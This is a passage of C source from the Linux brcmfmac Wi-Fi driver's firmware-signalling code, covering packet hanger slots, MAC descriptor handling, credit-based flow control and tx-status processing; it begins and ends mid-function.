prec, matchfn, &ifidx); while (skb) { brcmu_pkt_buf_free_skb(skb); skb = brcmu_pktq_pdeq_match(q, prec, matchfn, &ifidx); } } } static void brcmf_fws_hanger_init(struct brcmf_fws_hanger *hanger) { int i; memset(hanger, 0, sizeof(*hanger)); for (i = 0; i < ARRAY_SIZE(hanger->items); i++) hanger->items[i].state = BRCMF_FWS_HANGER_ITEM_STATE_FREE; } static u32 brcmf_fws_hanger_get_free_slot(struct brcmf_fws_hanger *h) { u32 i; i = (h->slot_pos + 1) % BRCMF_FWS_HANGER_MAXITEMS; while (i != h->slot_pos) { if (h->items[i].state == BRCMF_FWS_HANGER_ITEM_STATE_FREE) { h->slot_pos = i; goto done; } i++; if (i == BRCMF_FWS_HANGER_MAXITEMS) i = 0; } brcmf_err("all slots occupied\n"); h->failed_slotfind++; i = BRCMF_FWS_HANGER_MAXITEMS; done: return i; } static int brcmf_fws_hanger_pushpkt(struct brcmf_fws_hanger *h, struct sk_buff *pkt, u32 slot_id) { if (slot_id >= BRCMF_FWS_HANGER_MAXITEMS) return -ENOENT; if (h->items[slot_id].state != BRCMF_FWS_HANGER_ITEM_STATE_FREE) { brcmf_err("slot is not free\n"); h->failed_to_push++; return -EINVAL; } h->items[slot_id].state = BRCMF_FWS_HANGER_ITEM_STATE_INUSE; h->items[slot_id].pkt = pkt; h->pushed++; return 0; } static inline int brcmf_fws_hanger_poppkt(struct brcmf_fws_hanger *h, u32 slot_id, struct sk_buff **pktout, bool remove_item) { if (slot_id >= BRCMF_FWS_HANGER_MAXITEMS) return -ENOENT; if (h->items[slot_id].state == BRCMF_FWS_HANGER_ITEM_STATE_FREE) { brcmf_err("entry not in use\n"); h->failed_to_pop++; return -EINVAL; } *pktout = h->items[slot_id].pkt; if (remove_item) { h->items[slot_id].state = BRCMF_FWS_HANGER_ITEM_STATE_FREE; h->items[slot_id].pkt = NULL; h->popped++; } return 0; } static int brcmf_fws_hanger_mark_suppressed(struct brcmf_fws_hanger *h, u32 slot_id) { if (slot_id >= BRCMF_FWS_HANGER_MAXITEMS) return -ENOENT; if (h->items[slot_id].state == BRCMF_FWS_HANGER_ITEM_STATE_FREE) { brcmf_err("entry not in use\n"); return -EINVAL; } h->items[slot_id].state = BRCMF_FWS_HANGER_ITEM_STATE_INUSE_SUPPRESSED; return 0; } static void brcmf_fws_hanger_cleanup(struct brcmf_fws_info *fws, bool (*fn)(struct sk_buff *, void *), int ifidx) { struct brcmf_fws_hanger *h = &fws->hanger; struct sk_buff *skb; int i; enum brcmf_fws_hanger_item_state s; for (i = 0; i < ARRAY_SIZE(h->items); i++) { s = h->items[i].state; if (s == BRCMF_FWS_HANGER_ITEM_STATE_INUSE || s == BRCMF_FWS_HANGER_ITEM_STATE_INUSE_SUPPRESSED) { skb = h->items[i].pkt; if (fn == NULL || fn(skb, &ifidx)) { /* suppress packets freed from psq */ if (s == BRCMF_FWS_HANGER_ITEM_STATE_INUSE) brcmu_pkt_buf_free_skb(skb); h->items[i].state = BRCMF_FWS_HANGER_ITEM_STATE_FREE; } } } } static void brcmf_fws_macdesc_set_name(struct brcmf_fws_info *fws, struct brcmf_fws_mac_descriptor *desc) { if (desc == &fws->desc.other) strlcpy(desc->name, "MAC-OTHER", sizeof(desc->name)); else if (desc->mac_handle) scnprintf(desc->name, sizeof(desc->name), "MAC-%d:%d", desc->mac_handle, desc->interface_id); else scnprintf(desc->name, sizeof(desc->name), "MACIF:%d", desc->interface_id); } static void brcmf_fws_macdesc_init(struct brcmf_fws_mac_descriptor *desc, u8 *addr, u8 ifidx) { brcmf_dbg(TRACE, "enter: desc %p ea=%pM, ifidx=%u\n", desc, addr, ifidx); desc->occupied = 1; desc->state = BRCMF_FWS_STATE_OPEN; desc->requested_credit = 0; desc->requested_packet = 0; /* depending on use may need ifp->bssidx instead */ desc->interface_id = ifidx; desc->ac_bitmap = 0xff; /* update this when handling APSD */ if (addr) memcpy(&desc->ea[0], addr, ETH_ALEN); } static void brcmf_fws_macdesc_deinit(struct brcmf_fws_mac_descriptor *desc) { brcmf_dbg(TRACE, "enter: ea=%pM, ifidx=%u\n", desc->ea, desc->interface_id); desc->occupied = 0; desc->state = BRCMF_FWS_STATE_CLOSE; desc->requested_credit = 0; desc->requested_packet = 0; } static struct brcmf_fws_mac_descriptor * brcmf_fws_macdesc_lookup(struct brcmf_fws_info *fws, u8 *ea) { struct brcmf_fws_mac_descriptor *entry; int i; if (ea == NULL) return ERR_PTR(-EINVAL); entry = &fws->desc.nodes[0]; for (i = 0; i < ARRAY_SIZE(fws->desc.nodes); i++) { if (entry->occupied && !memcmp(entry->ea, ea, ETH_ALEN)) return entry; entry++; } return ERR_PTR(-ENOENT); } static struct brcmf_fws_mac_descriptor* brcmf_fws_macdesc_find(struct brcmf_fws_info *fws, struct brcmf_if *ifp, u8 *da) { struct brcmf_fws_mac_descriptor *entry = &fws->desc.other; bool multicast; multicast = is_multicast_ether_addr(da); /* Multicast destination, STA and P2P clients get the interface entry. * STA/GC gets the Mac Entry for TDLS destinations, TDLS destinations * have their own entry. */ if (multicast && ifp->fws_desc) { entry = ifp->fws_desc; goto done; } entry = brcmf_fws_macdesc_lookup(fws, da); if (IS_ERR(entry)) entry = ifp->fws_desc; done: return entry; } static bool brcmf_fws_macdesc_closed(struct brcmf_fws_info *fws, struct brcmf_fws_mac_descriptor *entry, int fifo) { struct brcmf_fws_mac_descriptor *if_entry; bool closed; /* for unique destination entries the related interface * may be closed. */ if (entry->mac_handle) { if_entry = &fws->desc.iface[entry->interface_id]; if (if_entry->state == BRCMF_FWS_STATE_CLOSE) return true; } /* an entry is closed when the state is closed and * the firmware did not request anything. */ closed = entry->state == BRCMF_FWS_STATE_CLOSE && !entry->requested_credit && !entry->requested_packet; /* Or firmware does not allow traffic for given fifo */ return closed || !(entry->ac_bitmap & BIT(fifo)); } static void brcmf_fws_macdesc_cleanup(struct brcmf_fws_info *fws, struct brcmf_fws_mac_descriptor *entry, int ifidx) { if (entry->occupied && (ifidx == -1 || ifidx == entry->interface_id)) { brcmf_fws_psq_flush(fws, &entry->psq, ifidx); entry->occupied = !!(entry->psq.len); } } static void brcmf_fws_bus_txq_cleanup(struct brcmf_fws_info *fws, bool (*fn)(struct sk_buff *, void *), int ifidx) { struct brcmf_fws_hanger_item *hi; struct pktq *txq; struct sk_buff *skb; int prec; u32 hslot; txq = brcmf_bus_gettxq(fws->drvr->bus_if); if (IS_ERR(txq)) { brcmf_dbg(TRACE, "no txq to clean up\n"); return; } for (prec = 0; prec < txq->num_prec; prec++) { skb = brcmu_pktq_pdeq_match(txq, prec, fn, &ifidx); while (skb) { hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT); hi = &fws->hanger.items[hslot]; WARN_ON(skb != hi->pkt); hi->state = BRCMF_FWS_HANGER_ITEM_STATE_FREE; brcmu_pkt_buf_free_skb(skb); skb = brcmu_pktq_pdeq_match(txq, prec, fn, &ifidx); } } } static void brcmf_fws_cleanup(struct brcmf_fws_info *fws, int ifidx) { int i; struct brcmf_fws_mac_descriptor *table; bool (*matchfn)(struct sk_buff *, void *) = NULL; if (fws == NULL) return; if (ifidx != -1) matchfn = brcmf_fws_ifidx_match; /* cleanup individual nodes */ table = &fws->desc.nodes[0]; for (i = 0; i < ARRAY_SIZE(fws->desc.nodes); i++) brcmf_fws_macdesc_cleanup(fws, &table[i], ifidx); brcmf_fws_macdesc_cleanup(fws, &fws->desc.other, ifidx); brcmf_fws_bus_txq_cleanup(fws, matchfn, ifidx); brcmf_fws_hanger_cleanup(fws, matchfn, ifidx); } static u8 brcmf_fws_hdrpush(struct brcmf_fws_info *fws, struct sk_buff *skb) { struct brcmf_fws_mac_descriptor *entry = brcmf_skbcb(skb)->mac; u8 *wlh; u16 data_offset = 0; u8 fillers; __le32 pkttag = cpu_to_le32(brcmf_skbcb(skb)->htod); __le16 pktseq = cpu_to_le16(brcmf_skbcb(skb)->htod_seq); brcmf_dbg(TRACE, "enter: %s, idx=%d hslot=%d htod %X seq %X\n", entry->name, brcmf_skb_if_flags_get_field(skb, INDEX), (le32_to_cpu(pkttag) >> 8) & 0xffff, brcmf_skbcb(skb)->htod, brcmf_skbcb(skb)->htod_seq); if (entry->send_tim_signal) data_offset += 2 + BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP_LEN; if (BRCMF_FWS_MODE_GET_REUSESEQ(fws->mode)) data_offset += BRCMF_FWS_TYPE_SEQ_LEN; /* +2 is for Type[1] and Len[1] in TLV, plus TIM signal */ data_offset += 2 + BRCMF_FWS_TYPE_PKTTAG_LEN; fillers = round_up(data_offset, 4) - data_offset; data_offset += fillers; skb_push(skb, data_offset); wlh = skb->data; wlh[0] = BRCMF_FWS_TYPE_PKTTAG; wlh[1] = BRCMF_FWS_TYPE_PKTTAG_LEN; memcpy(&wlh[2], &pkttag, sizeof(pkttag)); if (BRCMF_FWS_MODE_GET_REUSESEQ(fws->mode)) { wlh[1] += BRCMF_FWS_TYPE_SEQ_LEN; memcpy(&wlh[2 + BRCMF_FWS_TYPE_PKTTAG_LEN], &pktseq, sizeof(pktseq)); } wlh += wlh[1] + 2; if (entry->send_tim_signal) { entry->send_tim_signal = 0; wlh[0] = BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP; wlh[1] = BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP_LEN; wlh[2] = entry->mac_handle; wlh[3] = entry->traffic_pending_bmp; brcmf_dbg(TRACE, "adding TIM info: handle %d bmp 0x%X\n", entry->mac_handle, entry->traffic_pending_bmp); wlh += BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP_LEN + 2; entry->traffic_lastreported_bmp = entry->traffic_pending_bmp; } if (fillers) memset(wlh, BRCMF_FWS_TYPE_FILLER, fillers); return (u8)(data_offset >> 2); } static bool brcmf_fws_tim_update(struct brcmf_fws_info *fws, struct brcmf_fws_mac_descriptor *entry, int fifo, bool send_immediately) { struct sk_buff *skb; struct brcmf_skbuff_cb *skcb; s32 err; u32 len; u8 data_offset; int ifidx; /* check delayedQ and suppressQ in one call using bitmap */ if (brcmu_pktq_mlen(&entry->psq, 3 << (fifo * 2)) == 0) entry->traffic_pending_bmp &= ~NBITVAL(fifo); else entry->traffic_pending_bmp |= NBITVAL(fifo); entry->send_tim_signal = false; if (entry->traffic_lastreported_bmp != entry->traffic_pending_bmp) entry->send_tim_signal = true; if (send_immediately && entry->send_tim_signal && entry->state == BRCMF_FWS_STATE_CLOSE) { /* create a dummy packet and sent that. The traffic */ /* bitmap info will automatically be attached to that packet */ len = BRCMF_FWS_TYPE_PKTTAG_LEN + 2 + BRCMF_FWS_TYPE_SEQ_LEN + BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP_LEN + 2 + 4 + fws->drvr->hdrlen; skb = brcmu_pkt_buf_get_skb(len); if (skb == NULL) return false; skb_pull(skb, len); skcb = brcmf_skbcb(skb); skcb->mac = entry; skcb->state = BRCMF_FWS_SKBSTATE_TIM; skcb->htod = 0; skcb->htod_seq = 0; data_offset = brcmf_fws_hdrpush(fws, skb); ifidx = brcmf_skb_if_flags_get_field(skb, INDEX); brcmf_fws_unlock(fws); err = brcmf_proto_txdata(fws->drvr, ifidx, data_offset, skb); brcmf_fws_lock(fws); if (err) brcmu_pkt_buf_free_skb(skb); return true; } return false; } static void brcmf_fws_flow_control_check(struct brcmf_fws_info *fws, struct pktq *pq, u8 if_id) { struct brcmf_if *ifp = brcmf_get_ifp(fws->drvr, if_id); if (WARN_ON(!ifp)) return; if ((ifp->netif_stop & BRCMF_NETIF_STOP_REASON_FWS_FC) && pq->len <= BRCMF_FWS_FLOWCONTROL_LOWATER) brcmf_txflowblock_if(ifp, BRCMF_NETIF_STOP_REASON_FWS_FC, false); if (!(ifp->netif_stop & BRCMF_NETIF_STOP_REASON_FWS_FC) && pq->len >= BRCMF_FWS_FLOWCONTROL_HIWATER) { fws->stats.fws_flow_block++; brcmf_txflowblock_if(ifp, BRCMF_NETIF_STOP_REASON_FWS_FC, true); } return; } static int brcmf_fws_rssi_indicate(struct brcmf_fws_info *fws, s8 rssi) { brcmf_dbg(CTL, "rssi %d\n", rssi); return 0; } static int brcmf_fws_macdesc_indicate(struct brcmf_fws_info *fws, u8 type, u8 *data) { struct brcmf_fws_mac_descriptor *entry, *existing; u8 mac_handle; u8 ifidx; u8 *addr; mac_handle = *data++; ifidx = *data++; addr = data; entry = &fws->desc.nodes[mac_handle & 0x1F]; if (type == BRCMF_FWS_TYPE_MACDESC_DEL) { if (entry->occupied) { brcmf_dbg(TRACE, "deleting %s mac %pM\n", entry->name, addr); brcmf_fws_lock(fws); brcmf_fws_macdesc_cleanup(fws, entry, -1); brcmf_fws_macdesc_deinit(entry); brcmf_fws_unlock(fws); } else fws->stats.mac_update_failed++; return 0; } existing = brcmf_fws_macdesc_lookup(fws, addr); if (IS_ERR(existing)) { if (!entry->occupied) { brcmf_fws_lock(fws); entry->mac_handle = mac_handle; brcmf_fws_macdesc_init(entry, addr, ifidx); brcmf_fws_macdesc_set_name(fws, entry); brcmu_pktq_init(&entry->psq, BRCMF_FWS_PSQ_PREC_COUNT, BRCMF_FWS_PSQ_LEN); brcmf_fws_unlock(fws); brcmf_dbg(TRACE, "add %s mac %pM\n", entry->name, addr); } else { fws->stats.mac_update_failed++; } } else { if (entry != existing) { brcmf_dbg(TRACE, "copy mac %s\n", existing->name); brcmf_fws_lock(fws); memcpy(entry, existing, offsetof(struct brcmf_fws_mac_descriptor, psq)); entry->mac_handle = mac_handle; brcmf_fws_macdesc_deinit(existing); brcmf_fws_macdesc_set_name(fws, entry); brcmf_fws_unlock(fws); brcmf_dbg(TRACE, "relocate %s mac %pM\n", entry->name, addr); } else { brcmf_dbg(TRACE, "use existing\n"); WARN_ON(entry->mac_handle != mac_handle); /* TODO: what should we do here: continue, reinit, .. */ } } return 0; } static int brcmf_fws_macdesc_state_indicate(struct brcmf_fws_info *fws, u8 type, u8 *data) { struct brcmf_fws_mac_descriptor *entry; u8 mac_handle; int ret; mac_handle = data[0]; entry = &fws->desc.nodes[mac_handle & 0x1F]; if (!entry->occupied) { fws->stats.mac_ps_update_failed++; return -ESRCH; } brcmf_fws_lock(fws); /* a state update should wipe old credits */ entry->requested_credit = 0; entry->requested_packet = 0; if (type == BRCMF_FWS_TYPE_MAC_OPEN) { entry->state = BRCMF_FWS_STATE_OPEN; ret = BRCMF_FWS_RET_OK_SCHEDULE; } else { entry->state = BRCMF_FWS_STATE_CLOSE; brcmf_fws_tim_update(fws, entry, BRCMF_FWS_FIFO_AC_BK, false); brcmf_fws_tim_update(fws, entry, BRCMF_FWS_FIFO_AC_BE, false); brcmf_fws_tim_update(fws, entry, BRCMF_FWS_FIFO_AC_VI, false); brcmf_fws_tim_update(fws, entry, BRCMF_FWS_FIFO_AC_VO, true); ret = BRCMF_FWS_RET_OK_NOSCHEDULE; } brcmf_fws_unlock(fws); return ret; } static int brcmf_fws_interface_state_indicate(struct brcmf_fws_info *fws, u8 type, u8 *data) { struct brcmf_fws_mac_descriptor *entry; u8 ifidx; int ret; ifidx = data[0]; if (ifidx >= BRCMF_MAX_IFS) { ret = -ERANGE; goto fail; } entry = &fws->desc.iface[ifidx]; if (!entry->occupied) { ret = -ESRCH; goto fail; } brcmf_dbg(TRACE, "%s (%d): %s\n", brcmf_fws_get_tlv_name(type), type, entry->name); brcmf_fws_lock(fws); switch (type) { case BRCMF_FWS_TYPE_INTERFACE_OPEN: entry->state = BRCMF_FWS_STATE_OPEN; ret = BRCMF_FWS_RET_OK_SCHEDULE; break; case BRCMF_FWS_TYPE_INTERFACE_CLOSE: entry->state = BRCMF_FWS_STATE_CLOSE; ret = BRCMF_FWS_RET_OK_NOSCHEDULE; break; default: ret = -EINVAL; brcmf_fws_unlock(fws); goto fail; } brcmf_fws_unlock(fws); return ret; fail: fws->stats.if_update_failed++; return ret; } static int brcmf_fws_request_indicate(struct brcmf_fws_info *fws, u8 type, u8 *data) { struct brcmf_fws_mac_descriptor *entry; entry = &fws->desc.nodes[data[1] & 0x1F]; if (!entry->occupied) { if (type == BRCMF_FWS_TYPE_MAC_REQUEST_CREDIT) fws->stats.credit_request_failed++; else fws->stats.packet_request_failed++; return -ESRCH; } brcmf_dbg(TRACE, "%s (%d): %s cnt %d bmp %d\n", brcmf_fws_get_tlv_name(type), type, entry->name, data[0], data[2]); brcmf_fws_lock(fws); if (type == BRCMF_FWS_TYPE_MAC_REQUEST_CREDIT) entry->requested_credit = data[0]; else entry->requested_packet = data[0]; entry->ac_bitmap = data[2]; brcmf_fws_unlock(fws); return BRCMF_FWS_RET_OK_SCHEDULE; } static void brcmf_fws_macdesc_use_req_credit(struct brcmf_fws_mac_descriptor *entry, struct sk_buff *skb) { if (entry->requested_credit > 0) { entry->requested_credit--; brcmf_skb_if_flags_set_field(skb, REQUESTED, 1); brcmf_skb_if_flags_set_field(skb, REQ_CREDIT, 1); if (entry->state != BRCMF_FWS_STATE_CLOSE) brcmf_err("requested credit set while mac not closed!\n"); } else if (entry->requested_packet > 0) { entry->requested_packet--; brcmf_skb_if_flags_set_field(skb, REQUESTED, 1); brcmf_skb_if_flags_set_field(skb, REQ_CREDIT, 0); if (entry->state != BRCMF_FWS_STATE_CLOSE) brcmf_err("requested packet set while mac not closed!\n"); } else { brcmf_skb_if_flags_set_field(skb, REQUESTED, 0); brcmf_skb_if_flags_set_field(skb, REQ_CREDIT, 0); } } static void brcmf_fws_macdesc_return_req_credit(struct sk_buff *skb) { struct brcmf_fws_mac_descriptor *entry = brcmf_skbcb(skb)->mac; if ((brcmf_skb_if_flags_get_field(skb, REQ_CREDIT)) && (entry->state == BRCMF_FWS_STATE_CLOSE)) entry->requested_credit++; } static void brcmf_fws_return_credits(struct brcmf_fws_info *fws, u8 fifo, u8 credits) { int lender_ac; int *borrowed; int *fifo_credit; if (!credits) return; fws->fifo_credit_map |= 1 << fifo; if ((fifo == BRCMF_FWS_FIFO_AC_BE) && (fws->credits_borrowed[0])) { for (lender_ac = BRCMF_FWS_FIFO_AC_VO; lender_ac >= 0; lender_ac--) { borrowed = &fws->credits_borrowed[lender_ac]; if (*borrowed) { fws->fifo_credit_map |= (1 << lender_ac); fifo_credit = &fws->fifo_credit[lender_ac]; if (*borrowed >= credits) { *borrowed -= credits; *fifo_credit += credits; return; } else { credits -= *borrowed; *fifo_credit += *borrowed; *borrowed = 0; } } } } fws->fifo_credit[fifo] += credits; } static void brcmf_fws_schedule_deq(struct brcmf_fws_info *fws) { /* only schedule dequeue when there are credits for delayed traffic */ if ((fws->fifo_credit_map & fws->fifo_delay_map) || (!brcmf_fws_fc_active(fws) && fws->fifo_delay_map)) queue_work(fws->fws_wq, &fws->fws_dequeue_work); } static int brcmf_fws_enq(struct brcmf_fws_info *fws, enum brcmf_fws_skb_state state, int fifo, struct sk_buff *p) { int prec = 2 * fifo; u32 *qfull_stat = &fws->stats.delayq_full_error; struct brcmf_fws_mac_descriptor *entry; struct pktq *pq; struct sk_buff_head *queue; struct sk_buff *p_head; struct sk_buff *p_tail; u32 fr_new; u32 fr_compare; entry = brcmf_skbcb(p)->mac; if (entry == NULL) { brcmf_err("no mac descriptor found for skb %p\n", p); return -ENOENT; } brcmf_dbg(DATA, "enter: fifo %d skb %p\n", fifo, p); if (state == BRCMF_FWS_SKBSTATE_SUPPRESSED) { prec += 1; qfull_stat = &fws->stats.supprq_full_error; /* Fix out of order delivery of frames. Dont assume frame */ /* can be inserted at the end, but look for correct position */ pq = &entry->psq; if (pktq_full(pq) || pktq_pfull(pq, prec)) { *qfull_stat += 1; return -ENFILE; } queue = &pq->q[prec].skblist; p_head = skb_peek(queue); p_tail = skb_peek_tail(queue); fr_new = brcmf_skb_htod_tag_get_field(p, FREERUN); while (p_head != p_tail) { fr_compare = brcmf_skb_htod_tag_get_field(p_tail, FREERUN); /* be sure to handle wrap of 256 */ if (((fr_new > fr_compare) && ((fr_new - fr_compare) < 128)) || ((fr_new < fr_compare) && ((fr_compare - fr_new) > 128))) break; p_tail = skb_queue_prev(queue, p_tail); } /* Position found. Determine what to do */ if (p_tail == NULL) { /* empty list */ __skb_queue_tail(queue, p); } else { fr_compare = brcmf_skb_htod_tag_get_field(p_tail, FREERUN); if (((fr_new > fr_compare) && ((fr_new - fr_compare) < 128)) || ((fr_new < fr_compare) && ((fr_compare - fr_new) > 128))) { /* After tail */ __skb_queue_after(queue, p_tail, p); } else { /* Before tail */ __skb_insert(p, p_tail->prev, p_tail, queue); } } /* Complete the counters and statistics */ pq->len++; if (pq->hi_prec < prec) pq->hi_prec = (u8) prec; } else if (brcmu_pktq_penq(&entry->psq, prec, p) == NULL) { *qfull_stat += 1; return -ENFILE; } /* increment total enqueued packet count */ fws->fifo_delay_map |= 1 << fifo; fws->fifo_enqpkt[fifo]++; /* update the sk_buff state */ brcmf_skbcb(p)->state = state; /* * A packet has been pushed so update traffic * availability bitmap, if applicable */ brcmf_fws_tim_update(fws, entry, fifo, true); brcmf_fws_flow_control_check(fws, &entry->psq, brcmf_skb_if_flags_get_field(p, INDEX)); return 0; } static struct sk_buff *brcmf_fws_deq(struct brcmf_fws_info *fws, int fifo) { struct brcmf_fws_mac_descriptor *table; struct brcmf_fws_mac_descriptor *entry; struct sk_buff *p; int num_nodes; int node_pos; int prec_out; int pmsk; int i; table = (struct brcmf_fws_mac_descriptor *)&fws->desc; num_nodes = sizeof(fws->desc) / sizeof(struct brcmf_fws_mac_descriptor); node_pos = fws->deq_node_pos[fifo]; for (i = 0; i < num_nodes; i++) { entry = &table[(node_pos + i) % num_nodes]; if (!entry->occupied || brcmf_fws_macdesc_closed(fws, entry, fifo)) continue; if (entry->suppressed) pmsk = 2; else pmsk = 3; p = brcmu_pktq_mdeq(&entry->psq, pmsk << (fifo * 2), &prec_out); if (p == NULL) { if (entry->suppressed) { if (entry->suppr_transit_count) continue; entry->suppressed = false; p = brcmu_pktq_mdeq(&entry->psq, 1 << (fifo * 2), &prec_out); } } if (p == NULL) continue; brcmf_fws_macdesc_use_req_credit(entry, p); /* move dequeue position to ensure fair round-robin */ fws->deq_node_pos[fifo] = (node_pos + i + 1) % num_nodes; brcmf_fws_flow_control_check(fws, &entry->psq, brcmf_skb_if_flags_get_field(p, INDEX) ); /* * A packet has been picked up, update traffic * availability bitmap, if applicable */ brcmf_fws_tim_update(fws, entry, fifo, false); /* * decrement total enqueued fifo packets and * clear delay bitmap if done. */ fws->fifo_enqpkt[fifo]--; if (fws->fifo_enqpkt[fifo] == 0) fws->fifo_delay_map &= ~(1 << fifo); goto done; } p = NULL; done: brcmf_dbg(DATA, "exit: fifo %d skb %p\n", fifo, p); return p; } static int brcmf_fws_txstatus_suppressed(struct brcmf_fws_info *fws, int fifo, struct sk_buff *skb, u32 genbit, u16 seq) { struct brcmf_fws_mac_descriptor *entry = brcmf_skbcb(skb)->mac; u32 hslot; int ret; hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT); /* this packet was suppressed */ if (!entry->suppressed) { entry->suppressed = true; entry->suppr_transit_count = entry->transit_count; brcmf_dbg(DATA, "suppress %s: transit %d\n", entry->name, entry->transit_count); } entry->generation = genbit; brcmf_skb_htod_tag_set_field(skb, GENERATION, genbit); brcmf_skbcb(skb)->htod_seq = seq; if (brcmf_skb_htod_seq_get_field(skb, FROMFW)) { brcmf_skb_htod_seq_set_field(skb, FROMDRV, 1); brcmf_skb_htod_seq_set_field(skb, FROMFW, 0); } else { brcmf_skb_htod_seq_set_field(skb, FROMDRV, 0); } ret = brcmf_fws_enq(fws, BRCMF_FWS_SKBSTATE_SUPPRESSED, fifo, skb); if (ret != 0) { /* suppress q is full drop this packet */ brcmf_fws_hanger_poppkt(&fws->hanger, hslot, &skb, true); } else { /* Mark suppressed to avoid a double free during wlfc cleanup */ brcmf_fws_hanger_mark_suppressed(&fws->hanger, hslot); } return ret; } static int brcmf_fws_txs_process(struct brcmf_fws_info *fws, u8 flags, u32 hslot, u32 genbit, u16 seq) { u32 fifo; int ret; bool remove_from_hanger = true; struct sk_buff *skb; struct brcmf_skbuff_cb *skcb; struct brcmf_fws_mac_descriptor *entry = NULL; struct brcmf_if *ifp; brcmf_dbg(DATA, "flags %d\n", flags); if (flags == BRCMF_FWS_TXSTATUS_DISCARD) fws->stats.txs_discard++; else if (flags == BRCMF_FWS_TXSTATUS_CORE_SUPPRESS) { fws->stats.txs_supp_core++; remove_from_hanger = false; } else if (flags == BRCMF_FWS_TXSTATUS_FW_PS_SUPPRESS) { fws->stats.txs_supp_ps++; remove_from_hanger = false; } else if (flags == BRCMF_FWS_TXSTATUS_FW_TOSSED) fws->stats.txs_tossed++; else if (flags == BRCMF_FWS_TXSTATUS_HOST_TOSSED) fws->stats.txs_host_tossed++; else brcmf_err("unexpected txstatus\n"); ret = brcmf_fws_hanger_poppkt(&fws->hanger, hslot, &skb, remove_from_hanger); if (ret != 0) { brcmf_err("no packet in hanger slot: hslot=%d\n", hslot); return ret; } skcb = brcmf_skbcb(skb); entry = skcb->mac; if (WARN_ON(!entry)) { brcmu_pkt_buf_free_skb(skb); return -EINVAL; } entry->transit_count--; if (entry->suppressed && entry->suppr_transit_count) entry->suppr_transit_count--; brcmf_dbg(DATA, "%s flags %d htod %X seq %X\n", entry->name, flags, skcb->htod, seq); /* pick up the implicit credit from this packet */ fifo = brcmf_skb_htod_tag_get_field(skb, FIFO); if ((fws->fcmode == BRCMF_FWS_FCMODE_IMPLIED_CREDIT) || (brcmf_skb_if_flags_get_field(skb, REQ_CREDIT)) || (flags == BRCMF_FWS_TXSTATUS_HOST_TOSSED)) { brcmf_fws_return_credits(fws, fifo, 1); brcmf_fws_schedule_deq(fws); } brcmf_fws_macdesc_return_req_credit(skb); ret = brcmf_proto_hdrpull(fws->drvr, false, skb, &ifp); if (ret) { brcmu_pkt_buf_free_skb(skb); return -EINVAL; } if (!remove_from_hanger) ret = brcmf_fws_txstatus_suppressed(fws, fifo, skb, genbit, seq); if (remove_from_hanger || ret) brcmf_txfinalize(ifp, skb, true); return 0; } static int brcmf_fws_fifocreditback_indicate(struct brcmf_fws_info *fws, u8 *data) { int i; if (fws->fcmode != BRCMF_FWS_FCMODE_EXPLICIT_CREDIT) { brcmf_dbg(INFO, "ignored\n"); return BRCMF_FWS_RET_OK_NOSCHEDULE; } brcmf_dbg(DATA, "enter: data %pM\n", data); brcmf_fws_lock(fws); for (i = 0; i < BRCMF_FWS_FIFO_COUNT; i++) brcmf_fws_return_credits(fws, i, data[i]); brcmf_dbg(DATA, "map: credit %x delay %x\n", fws->fifo_credit_map, fws->fifo_delay_map); brcmf_fws_unlock(fws); return BRCMF_FWS_RET_OK_SCHEDULE; } static int brcmf_fws_txstatus_indicate(struct brcmf_fws_info *fws, u8 *data) { __le32 status_le; __le16 seq_le; u32 status; u32 hslot; u32 genbit; u8 flags; u16 seq; fws->stats.txs_indicate++; memcpy(&status_le, data, sizeof(status_le)); status = le32_to_cpu(status_le); flags = brcmf_txstatus_get_field(status, FLAGS); hslot = brcmf_txstatus_get_field(status, HSLOT); genbit = brcmf_txstatus_get_field(status, GENERATION); if (BRCMF_FWS_MODE_GET_REUSESEQ(fws->mode)) { memcpy(&seq_le, &data[BRCMF_FWS_TYPE_PKTTAG_LEN], sizeof(seq_le)); seq = le16_to_cpu(seq_le); } else { seq = 0; } brcmf_fws_lock(fws); brcmf_fws_txs_process(fws, flags, hslot, genbit, seq); brcmf_fws_unlock(fws); return BRCMF_FWS_RET_OK_NOSCHEDULE; } static int brcmf_fws_dbg_seqnum_check(struct brcmf_fws_info *fws, u8 *data) { __le32 timestamp; memcpy(&timestamp, &data[2], sizeof(timestamp)); brcmf_dbg(CTL, "received: seq %d, timestamp %d\n", data[1], le32_to_cpu(timestamp)); return 0; } static int brcmf_fws_notify_credit_map(struct brcmf_if *ifp, const struct brcmf_event_msg *e, void *data) { struct brcmf_fws_info *fws = ifp->drvr->fws; int i; u8 *credits = data; if (e->datalen < BRCMF_FWS_FIFO_COUNT) { brcmf_err("event payload too small (%d)\n", e->datalen); return -EINVAL; } if (fws->creditmap_received) return 0; fws->creditmap_received = true; brcmf_dbg(TRACE, "enter: credits %pM\n", credits); brcmf_fws_lock(fws); for (i = 0; i < ARRAY_SIZE(fws->fifo_credit); i++) { if (*credits) fws->fifo_credit_map |= 1 << i; else fws->fifo_credit_map &= ~(1 << i); fws->fifo_credit[i] = *credits++; } brcmf_fws_schedule_deq(fws); brcmf_fws_unlock(fws); return 0; } static int brcmf_fws_notify_bcmc_credit_support(struct brcmf_if *ifp, const struct brcmf_event_msg *e, void *data) { struct brcmf_fws_info *fws = ifp->drvr->fws; brcmf_fws_lock(fws); if (fws) fws->bcmc_credit_check = true; brcmf_fws_unlock(fws); return 0; } void brcmf_fws_hdrpull(struct brcmf_if *ifp, s16 siglen, struct sk_buff *skb) { struct brcmf_skb_reorder_data *rd; struct brcmf_fws_info *fws = ifp->drvr->fws; u8 *signal_data; s16 data_len; u8 type; u8 len; u8 *data; s32 status; s32 err; brcmf_dbg(HDRS, "enter: ifidx %d, skblen %u, sig %d\n", ifp->ifidx, skb->len, siglen); WARN_ON(siglen > skb->len); if (!siglen) return; /* if flow control disabled, skip to packet data and leave */ if ((!fws) || (!fws->fw_signals)) { skb_pull(skb, siglen); return; } fws->stats.header_pulls++; data_len = siglen; signal_data = skb->data; status = BRCMF_FWS_RET_OK_NOSCHEDULE; while (data_len > 0) { /* extract tlv info */ type = signal_data[0]; /* FILLER type is actually not a TLV, but * a single byte that can be skipped. */ if (type == BRCMF_FWS_TYPE_FILLER) { signal_data += 1; data_len -= 1; continue; } len = signal_data[1]; data = signal_data + 2; brcmf_dbg(HDRS, "tlv type=%s (%d), 